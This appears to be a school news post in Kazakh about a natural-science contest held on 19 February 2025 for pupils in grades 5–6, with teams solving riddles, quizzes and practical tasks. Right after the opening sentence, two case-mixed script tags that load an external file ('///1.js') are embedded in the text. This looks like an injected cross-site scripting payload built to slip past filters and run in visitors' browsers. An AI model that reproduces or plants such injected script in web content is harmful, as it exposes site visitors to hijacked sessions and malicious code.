2025 жылдың 19 ақпанында біздің білім беру ұйымымызда «Тірі жәні өлі табиғаттағы үдерістер» тақырыбына арналған жаратылыстану пәнінен қызықты конкурс өтті.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

19.02.2025

2025 жылдың 19 ақпанында біздің білім беру ұйымымызда «Тірі жәні өлі табиғаттағы үдерістер» тақырыбына арналған жаратылыстану пәнінен қызықты конкурс өтті. Қатысушылар 5-6 сынып оқушылары болды, олар әртүрлі тапсырмаларды орындау арқылы өз білімдері мен шығармашылықтарын көрсетті.

Конкурс бірнеше кезеңнен тұрды, онда оқушылар тек теориялық білімдерін ғана емес, сонымен қатар командада жұмыс істей білу, логикалық ойлау және табиғатқа қатысты сұрақтарға жылдам жауап табу қабілеттерін де көрсетті. Командалар жұмбақтар шешіп, викториналарға қатысып, практикалық тапсырмаларды орындап, тірі және өлі табиғат компоненттері туралы білімдерін тереңдетуге мүмкіндік алды.

Просмотров: 1483


Пікір қосу



Деректерді қолтаңбаға қосу